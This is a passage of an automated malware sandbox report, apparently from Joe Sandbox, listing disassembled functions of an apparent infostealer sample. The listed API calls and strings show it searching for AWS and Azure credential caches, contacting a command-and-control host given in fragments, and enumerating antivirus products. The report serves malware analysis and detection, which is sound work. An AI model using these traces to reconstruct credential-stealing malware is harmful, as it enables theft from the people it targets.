                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                              • API String ID: 780282842-974132213
                                                                                                                                                                              • Opcode ID: 82d459f32d0d4060af442e07a80c8dd5528ee6ad62b8736ac2aeefc7f6879563
                                                                                                                                                                              • Instruction ID: 0a1f1b6685fac6fd7a9b3365e02717f8fae070fa88af277c8c9f1fb5fd1988cb
                                                                                                                                                                              • Opcode Fuzzy Hash: 82d459f32d0d4060af442e07a80c8dd5528ee6ad62b8736ac2aeefc7f6879563
                                                                                                                                                                              • Instruction Fuzzy Hash: F641C371DC022C7AEB15EB60ED87FDD737CBB05710F500895B60AA7080EEB49A888F55
                                                                                                                                                                              Function 02A0ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AC8A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0AD94
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0AD9B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A373DC,00000000), ref: 02A0AE4C
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A373E0), ref: 02A0AE74
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AE98
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373E4), ref: 02A0AEA4
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEAE
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373E8), ref: 02A0AEBA
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEC4
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373EC), ref: 02A0AED0
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEDA
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373F0), ref: 02A0AEE6
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEF0
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373F4), ref: 02A0AEFC
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AF06
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373F8), ref: 02A0AF12
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AF1C
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373FC), ref: 02A0AF28
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0AF7A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0AF95
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0AFD8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1956182324-0
                                                                                                                                                                              • Opcode ID: a1b6a5a055ca4883f811affe99da998871f59af19a76cce5666891092a05c2f6
                                                                                                                                                                              • Instruction ID: c442f50b7cf56911399d70325bf54821f21918e6c455086197fd1600354f6d90
                                                                                                                                                                              • Opcode Fuzzy Hash: a1b6a5a055ca4883f811affe99da998871f59af19a76cce5666891092a05c2f6
                                                                                                                                                                              • Instruction Fuzzy Hash: F1C1D732D84228AFDF01AFA0EE89ADD7B76EF04350F504555F901B7060DF71AA959F90
                                                                                                                                                                              Function 02A17041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013B9), ref: 02A10C5F
                                                                                                                                                                                • Part of subcall function 02A10C53: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C66
                                                                                                                                                                                • Part of subcall function 02A10C53: GetUserNameA.ADVAPI32(00000000,02A013B9), ref: 02A10C7A
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,02A1858F), ref: 02A170DD
                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,?,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A170EC
                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,02A366DA), ref: 02A1760A
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A176CB
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A176E4
                                                                                                                                                                                • Part of subcall function 02A04B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04BCD
                                                                                                                                                                                • Part of subcall function 02A04B2E: StrCmpCA.SHLWAPI(?), ref: 02A04BEB
                                                                                                                                                                                • Part of subcall function 02A139C2: StrCmpCA.SHLWAPI(?,block,?,?,02A17744), ref: 02A139D7
                                                                                                                                                                                • Part of subcall function 02A139C2: ExitProcess.KERNEL32 ref: 02A139E2
                                                                                                                                                                                • Part of subcall function 02A05F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05FD8
                                                                                                                                                                                • Part of subcall function 02A05F39: StrCmpCA.SHLWAPI(?), ref: 02A05FF6
                                                                                                                                                                                • Part of subcall function 02A13198: strtok_s.MSVCRT ref: 02A131B7
                                                                                                                                                                                • Part of subcall function 02A13198: strtok_s.MSVCRT ref: 02A1323A
                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02A17A9A
                                                                                                                                                                                • Part of subcall function 02A05F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0618E
                                                                                                                                                                                • Part of subcall function 02A05F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A061D2
                                                                                                                                                                                • Part of subcall function 02A05F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06200
                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,02A1858F), ref: 02A17100
                                                                                                                                                                                • Part of subcall function 02A1257F: __EH_prolog3_catch_GS.LIBCMT ref: 02A12589
                                                                                                                                                                                • Part of subcall function 02A1257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,02A17E31,.exe,02A36CCC,02A36CC8,02A36CC4,02A36CC0,02A36CBC,02A36CB8,02A36CB4,02A36CB0,02A36CAC,02A36CA8,02A36CA4), ref: 02A125A8
                                                                                                                                                                                • Part of subcall function 02A1257F: Process32First.KERNEL32(00000000,00000128), ref: 02A125B8
                                                                                                                                                                                • Part of subcall function 02A1257F: Process32Next.KERNEL32(00000000,00000128), ref: 02A125CA
                                                                                                                                                                                • Part of subcall function 02A1257F: StrCmpCA.SHLWAPI(?), ref: 02A125DC
                                                                                                                                                                                • Part of subcall function 02A1257F: CloseHandle.KERNEL32(00000000), ref: 02A125F0
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A18000
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocateConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                              • String ID: .exe$.exe$_DEBUG.zip$b74ef0d8ce56e494b0d83e1d5be9dbeb$cowod.$hopto$http://$org
                                                                                                                                                                              • API String ID: 2665860859-1990912409
                                                                                                                                                                              • Opcode ID: 70f91ae6cd3cd9cea463a19717d68c6e0626b3e89ab271ac0b95ee2bdc6a8359
                                                                                                                                                                              • Instruction ID: dd33a180cd12bed904ccc9d0a1f9164c99e53bfbd1c5eaae36c6fb31709aa6a3
                                                                                                                                                                              • Opcode Fuzzy Hash: 70f91ae6cd3cd9cea463a19717d68c6e0626b3e89ab271ac0b95ee2bdc6a8359
                                                                                                                                                                              • Instruction Fuzzy Hash: 99923E319883519FD621FF24DA8568EF7E6FF80720F414929E89467150DF70AA4E8F93
                                                                                                                                                                              Function 02A135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A135EA
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,true), ref: 02A136AC
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 02A1376E
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A1379F
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A137DB
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A13817
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A13853
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A1388F
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A138CB
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A1398F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                              • API String ID: 2116072422-2658103896
                                                                                                                                                                              • Opcode ID: 6ff5bd26c6b7ad451cf0f351e26cd98f87683b013ee48d897e5f1f972183ff32
                                                                                                                                                                              • Instruction ID: 34e9a629e989b7ed154c771323ff899387b26d60e11317ac7a1ad28a40b46de3
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ff5bd26c6b7ad451cf0f351e26cd98f87683b013ee48d897e5f1f972183ff32
                                                                                                                                                                              • Instruction Fuzzy Hash: ABB117758812289BCF60EF54DD88BDA77B9BF18310F0005E5E94AA7261EF70DA98CF50
                                                                                                                                                                              Function 02A06963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A069C5
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A069DF
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06A0E
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06A4D
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06A7D
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A06A88
                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A06AAC
                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A06B40
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06B50
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06B5C
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06B68
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                              • String ID: ERROR$ERROR$GET
                                                                                                                                                                              • API String ID: 3863758870-2509457195
                                                                                                                                                                              • Opcode ID: 088bff6095d722cc2f44636f32574c1392118b0bf539af47f03b8412863bb12f
                                                                                                                                                                              • Instruction ID: f90662611cb5d191b73fff962bedc440bbc418ae60f1fa3cd6472e66f0313b5d
                                                                                                                                                                              • Opcode Fuzzy Hash: 088bff6095d722cc2f44636f32574c1392118b0bf539af47f03b8412863bb12f
                                                                                                                                                                              • Instruction Fuzzy Hash: CC515F71940269AFEB21AF50EDC4BAEB7BDFB04744F0081A5F549A6090DF309ED59F90
                                                                                                                                                                              Function 02A11997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A1199E
                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A119AD
                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A119BE
                                                                                                                                                                              • CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A119D8
                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11A0E
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 02A11A5D
                                                                                                                                                                                • Part of subcall function 02A11D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,02A11A80,?), ref: 02A11D4A
                                                                                                                                                                                • Part of subcall function 02A11D42: CharToOemW.USER32(?,00000000), ref: 02A11D56
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 02A11A8B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                              • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                              • API String ID: 4288110179-315474579
                                                                                                                                                                              • Opcode ID: ed9ecce172319be349d8278548e9aa73ac249ea08356b8753cf56654c283daf3
                                                                                                                                                                              • Instruction ID: 1bf1a76a05777094d8ccf32852d445f480852d56e4d7510fcf67f1fb4732cd26
                                                                                                                                                                              • Opcode Fuzzy Hash: ed9ecce172319be349d8278548e9aa73ac249ea08356b8753cf56654c283daf3
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D313B70A40245BBEB219B95CC49EAFBF7DFBC5B20F104609F612AA190DE749941CB70
                                                                                                                                                                              Function 02A01284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A012A7
                                                                                                                                                                              • _memset.LIBCMT ref: 02A012B6
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9EC), ref: 02A012D0
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9F0), ref: 02A012DE
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9F4), ref: 02A012EC
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9F8), ref: 02A012FA
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3A9FC), ref: 02A01308
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA00), ref: 02A01316
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA04), ref: 02A01324
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA08), ref: 02A01332
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA0C), ref: 02A01340
